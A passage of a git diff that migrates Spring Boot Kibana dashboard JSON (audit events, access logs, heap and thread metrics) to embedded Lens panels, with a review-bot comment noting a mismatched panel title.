"phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.audit_events" + } + } + } + ], + "query": { + "language": "kuery", + 
"query": "" + }, + "visualization": { + "columns": [ + { + "alignment": "center", + "columnId": "a84b9b2d-8712-4975-a242-7996161a71da", + "hidden": false, + "isTransposed": false, + "width": 166 + }, + { + "alignment": "center", + "columnId": "5209c821-5ae2-40d6-b2c5-321b76c96ebc", + "isTransposed": false, + "width": 183.41666666666669 + }, + { + "alignment": "center", + "columnId": "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081", + "isTransposed": false, + "width": 296.41666666666674 + }, + { + "alignment": "center", + "columnId": "3624c7a7-411d-4138-9fdf-8b8a0694d285", + "hidden": true, + "isTransposed": false + }, + { + "alignment": "center", + "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "isTransposed": false, + "width": 128.16666666666652 + }, + { + "alignment": "center", + "columnId": "52932019-4385-469b-9f4d-6becd3a912f6", + "isTransposed": false + } + ], + "fitRowToContent": true, + "layerId": "41dbf555-e40a-45dc-83d7-18b18263e8de", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 + }, + "rowHeight": "auto", + "rowHeightLines": 2, + "sorting": { + "columnId": "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "direction": "desc" } - } + } + }, + "title": "Audit Events [Logs Spring Boot]", + "visualizationType": "lnsDatatable", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 16, + "i": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a", + "w": 32, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 16, - "i": 
"e3c09d50-2585-4fdf-90bd-1b1a837edf6a", - "w": 32, - "x": 0, - "y": 0 - }, - "panelIndex": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a", - "panelRefName": "panel_e3c09d50-2585-4fdf-90bd-1b1a837edf6a", - "type": "lens", - "version": "8.1.0" + "panelIndex": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "73272b0b-e1d4-4a44-9904-adaad0d24159": { + "columnOrder": [ + "2fe1f301-207a-48ff-aa1c-13aaed31b9db", + "1b8c4683-1d76-49cc-95c8-691612657847" + ], + "columns": { + "1b8c4683-1d76-49cc-95c8-691612657847": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } + } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "2fe1f301-207a-48ff-aa1c-13aaed31b9db": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Authentication Type", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "1b8c4683-1d76-49cc-95c8-691612657847", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.type" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.audit_events" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.audit_events" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": 
"default", + "layerId": "73272b0b-e1d4-4a44-9904-adaad0d24159", + "layerType": "data", + "legendDisplay": "show", + "legendMaxLines": 1, + "legendPosition": "bottom", + "nestedLegend": true, + "numberDisplay": "percent", + "truncateLegend": true, + "legendSize": "auto", + "primaryGroups": [ + "2fe1f301-207a-48ff-aa1c-13aaed31b9db" + ], + "metrics": [ + "1b8c4683-1d76-49cc-95c8-691612657847" + ] + } + ], + "shape": "pie" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 16, - "i": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46", - "w": 16, - "x": 32, - "y": 0 - }, - "panelIndex": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46", - "panelRefName": "panel_33cab98f-7c8f-4d79-ad28-f2a0e7113b46", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Spring Boot] Audit Events", - "version": 1 - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-6fe11330-c7f1-11ec-986a-f1e84447fd00", - "migrationVersion": { - "dashboard": "8.2.0" - }, - "references": [ - { - "id": "spring_boot-a41702e0-c7f1-11ec-986a-f1e84447fd00", - "name": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a:panel_e3c09d50-2585-4fdf-90bd-1b1a837edf6a", - "type": "lens" + "title": "Authentication type [Logs Spring Boot]", + "visualizationType": "lnsPie", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00", - "name": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46:panel_33cab98f-7c8f-4d79-ad28-f2a0e7113b46", - "type": "lens" - } + "gridData": { + "h": 16, + "i": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46", + "w": 16, + "x": 32, + "y": 0 + }, + "panelIndex": 
"33cab98f-7c8f-4d79-ad28-f2a0e7113b46", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Spring Boot] Audit Events", + "version": 1 + }, + "references": [ + { + "type": "index-pattern", + "name": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a:indexpattern-datasource-layer-41dbf555-e40a-45dc-83d7-18b18263e8de", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "e3c09d50-2585-4fdf-90bd-1b1a837edf6a:96d564d4-65af-4ed2-a3f6-0af7787d4b01", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46:indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "33cab98f-7c8f-4d79-ad28-f2a0e7113b46:b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/spring_boot/kibana/dashboard/spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/dashboard/spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd.json index 982926ceb49..8011aaad857 100644 --- a/packages/spring_boot/kibana/dashboard/spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd.json +++ b/packages/spring_boot/kibana/dashboard/spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd.json 
@@ -1,78 +1,380 @@ { - "attributes": { - "description": "Access logs dashboard of Spring Boot application.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2024-01-03T20:12:28.833Z", + "created_at": "2024-01-03T20:12:28.833Z", + "version": "WzEwMCwxXQ==", + "attributes": { + "description": "Access logs dashboard of Spring Boot application.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { + "columnOrder": [ + "59a904ae-9fcd-4d06-b201-09117b1981d6", + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "columns": { + "59a904ae-9fcd-4d06-b201-09117b1981d6": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of http.request.method", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "9a043bf0-329d-4632-a095-86760550bd75", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "http.request.method" + }, + "9a043bf0-329d-4632-a095-86760550bd75": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } } - 
} + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "76ee3705-3872-45f3-8cbf-f0595d97905d", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": true, + "numberDisplay": "percent", + "legendSize": "auto", + "primaryGroups": [ + "59a904ae-9fcd-4d06-b201-09117b1981d6" + ], + "metrics": [ + "9a043bf0-329d-4632-a095-86760550bd75" + ] + } + ], + "shape": "pie" + } + }, + "title": "HTTP Request method types [Metrics Spring Boot]", + "visualizationType": "lnsPie", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "76ee3705-3872-45f3-8cbf-f0595d97905d", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 13, + "i": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c", + "w": 16, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "panelIndex": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c", + "title": "HTTP Request method types [Logs Spring Boot]", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { + 
"columnOrder": [ + "2dbf54bf-2147-4302-902b-a176ae9df338", + "21757728-2591-42a8-bed5-10cc5c097d85", + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "columns": { + "21757728-2591-42a8-bed5-10cc5c097d85": { + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code", + "operationType": "range", + "params": { + "maxBars": "auto", + "ranges": [ + { + "from": 0, + "label": "", + "to": 1000 + } + ], + "type": "histogram" + }, + "scale": "interval", + "sourceField": "http.response.status_code" + }, + "2dbf54bf-2147-4302-902b-a176ae9df338": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "1m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9a043bf0-329d-4632-a095-86760550bd75": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "ba5b5f52-398a-48c9-8021-520aa78ccdba", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 13, - "i": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c", - "w": 16, - "x": 0, - "y": 0 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c", - "panelRefName": "panel_d008cb2e-26ec-4035-a79e-fd58d8b99b6c", - "title": "HTTP Request method types [Logs Spring Boot]", - "type": 
"lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "86f18b62-ecd7-48fa-8459-896739b71ce6", - "w": 32, - "x": 16, - "y": 0 + "layers": [ + { + "accessors": [ + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "splitAccessor": "21757728-2591-42a8-bed5-10cc5c097d85", + "xAccessor": "2dbf54bf-2147-4302-902b-a176ae9df338" + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false, + "verticalAlignment": "top", + "legendSize": "auto" }, - "panelIndex": "86f18b62-ecd7-48fa-8459-896739b71ce6", - "panelRefName": "panel_86f18b62-ecd7-48fa-8459-896739b71ce6", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Spring Boot] Access logs", - "version": 1 - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-6fe782d0-ca15-11ec-b4b1-b57f75afa7dd", - "migrationVersion": { - "dashboard": "8.2.0" - }, - "references": [ - { - "id": "spring_boot-a676b6b0-ca13-11ec-b4b1-b57f75afa7dd", - "name": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c:panel_d008cb2e-26ec-4035-a79e-fd58d8b99b6c", - "type": "lens" + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "HTTP Request status code [Logs Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": 
"indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ba5b5f52-398a-48c9-8021-520aa78ccdba", + "type": "index-pattern" + } + ] + } }, - { - "id": "spring_boot-5240dfb0-ca15-11ec-b4b1-b57f75afa7dd", - "name": "86f18b62-ecd7-48fa-8459-896739b71ce6:panel_86f18b62-ecd7-48fa-8459-896739b71ce6", - "type": "lens" - } + "gridData": { + "h": 13, + "i": "86f18b62-ecd7-48fa-8459-896739b71ce6", + "w": 32, + "x": 16, + "y": 0 + }, + "panelIndex": "86f18b62-ecd7-48fa-8459-896739b71ce6", + "type": "lens", + "version": "8.6.0" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Spring Boot] Access logs", + "version": 1 + }, + "references": [ + { + "type": "index-pattern", + "name": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c:indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "d008cb2e-26ec-4035-a79e-fd58d8b99b6c:76ee3705-3872-45f3-8cbf-f0595d97905d", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "86f18b62-ecd7-48fa-8459-896739b71ce6:indexpattern-datasource-current-indexpattern", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "86f18b62-ecd7-48fa-8459-896739b71ce6:indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "id": "logs-*" + }, + { + "type": "index-pattern", + "name": "86f18b62-ecd7-48fa-8459-896739b71ce6:ba5b5f52-398a-48c9-8021-520aa78ccdba", + "id": "logs-*" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/spring_boot/kibana/dashboard/spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd.json b/packages/spring_boot/kibana/dashboard/spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd.json index 8cb7881e227..909a74c5620 100644 
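Review bot: The first panel's embedded Lens attributes carry `"title": "HTTP Request method types [Metrics Spring Boot]"` while the panel-level title on the same panel reads `"HTTP Request method types [Logs Spring Boot]"`; since that panel filters on `event.dataset: spring_boot.http_trace` and every reference points at `logs-*`, the `[Metrics …]` suffix looks like a leftover and should be `"HTTP Request method types [Logs Spring Boot]"` so the two titles agree. The dashboard shows the panel-level title, so this is cosmetic until someone opens the visualization from the panel or the by-value title is surfaced elsewhere. The second panel in this hunk already uses the `[Logs Spring Boot]` suffix consistently in both places.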
--- a/packages/spring_boot/kibana/dashboard/spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd.json +++ b/packages/spring_boot/kibana/dashboard/spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd.json 
@@ -1,145 +1,1304 @@ { - "attributes": { - "description": "Metrics related to threads, heap and non heap memory.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "spring_boot-c89e1510-ca15-11ec-b4b1-b57f75afa7dd", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2024-01-03T20:12:28.833Z", + "created_at": "2024-01-03T20:12:28.833Z", + "version": "WzEwMSwxXQ==", + "attributes": { + "description": "Metrics related to threads, heap and non heap memory.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "31ad067d-6820-43dc-a6fd-7a32a6a121f5": { + "columnOrder": [ + "ce51dd8d-7fd5-4ebf-a835-9ffe83125746", + "07747e2a-9e75-47d8-b1d4-87c0340cf60d", + "9b2297d6-8625-44a3-a7ba-633da40efcfb" + ], + "columns": { + "07747e2a-9e75-47d8-b1d4-87c0340cf60d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Heap Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.memory.heap.used" + }, + "9b2297d6-8625-44a3-a7ba-633da40efcfb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Non Heap Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } + }, + 
"showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.memory.non_heap.used" + }, + "ce51dd8d-7fd5-4ebf-a835-9ffe83125746": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.memory" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.memory" + } + } } - } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "07747e2a-9e75-47d8-b1d4-87c0340cf60d", + "9b2297d6-8625-44a3-a7ba-633da40efcfb" + ], + "layerId": "31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ce51dd8d-7fd5-4ebf-a835-9ffe83125746" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Memory" + } + }, + "title": "Heap and non-heap memory [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "type": "index-pattern" + } + ] + } }, - 
"optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 15, + "i": "12e70c57-6059-400c-974f-b69423d435e9", + "w": 24, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "12e70c57-6059-400c-974f-b69423d435e9", - "w": 24, - "x": 0, - "y": 0 - }, - "panelIndex": "12e70c57-6059-400c-974f-b69423d435e9", - "panelRefName": "panel_12e70c57-6059-400c-974f-b69423d435e9", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 10, - "i": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", - "w": 24, - "x": 24, - "y": 0 - }, - "panelIndex": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", - "panelRefName": "panel_eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", - "title": "Total threads [Metrics Spring Boot]", - "type": "lens", - "version": "8.1.0" + "panelIndex": "12e70c57-6059-400c-974f-b69423d435e9", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "760bf001-a3ae-46e6-a366-ab2c9c777cfc": { + "columnOrder": [ + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39", + "bd774bf7-35bf-4dd7-a647-897d8b5945df" + ], + "columns": { + "bd774bf7-35bf-4dd7-a647-897d8b5945df": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Threads", + "operationType": "last_value", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 0 + } + }, + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.threading.threads.started" + }, + "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + 
"dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "61418bc6-4106-4f91-81ea-1e1071b7c9bb", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.threading" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.threading" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "bd774bf7-35bf-4dd7-a647-897d8b5945df" + ], + "layerId": "760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "e89bff02-e4b8-48aa-96e1-ae2ae6c28e39" + } + ], + "legend": { + "isInside": false, + "isVisible": true, + "legendSize": "auto", + "maxLines": 1, + "position": "right", + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Total Threads" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "f3782cac-5b20-413c-a88d-cb01ebee5772", - "w": 24, - "x": 0, - "y": 15 - }, - "panelIndex": "f3782cac-5b20-413c-a88d-cb01ebee5772", - "panelRefName": "panel_f3782cac-5b20-413c-a88d-cb01ebee5772", - "type": "lens", - "version": "8.1.0" + "title": "Threads [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-760bf001-a3ae-46e6-a366-ab2c9c777cfc", + "type": 
"index-pattern" + }, + { + "id": "metrics-*", + "name": "61418bc6-4106-4f91-81ea-1e1071b7c9bb", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 10, + "i": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", + "w": 24, + "x": 24, + "y": 0 + }, + "panelIndex": "eb0fc5f9-1c7d-48bc-8098-ba58f9962dee", + "title": "Total threads [Metrics Spring Boot]", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e937f0c4-f880-4837-9315-69d043a3f6b1": { + "columnOrder": [ + "94f7e582-69e9-4fe4-9111-75aaa6a3d470", + "01e713a3-bda9-4e10-b460-988900367abf", + "df8aa04a-8859-48a8-8624-e204eb09ad23", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X0", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X1", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X2", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X3", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X4", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X5", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X6", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X7", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X8", + "79ffbc3e-e907-45d9-b727-6710ca8b19c7X9", + "df8aa04a-8859-48a8-8624-e204eb09ad23X0", + "df8aa04a-8859-48a8-8624-e204eb09ad23X1", + "df8aa04a-8859-48a8-8624-e204eb09ad23X2", + "df8aa04a-8859-48a8-8624-e204eb09ad23X3", + "df8aa04a-8859-48a8-8624-e204eb09ad23X4", + "df8aa04a-8859-48a8-8624-e204eb09ad23X5", + "df8aa04a-8859-48a8-8624-e204eb09ad23X6", + "df8aa04a-8859-48a8-8624-e204eb09ad23X7", + "df8aa04a-8859-48a8-8624-e204eb09ad23X8", + "df8aa04a-8859-48a8-8624-e204eb09ad23X9" + ], + "columns": { + "01e713a3-bda9-4e10-b460-988900367abf": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": 
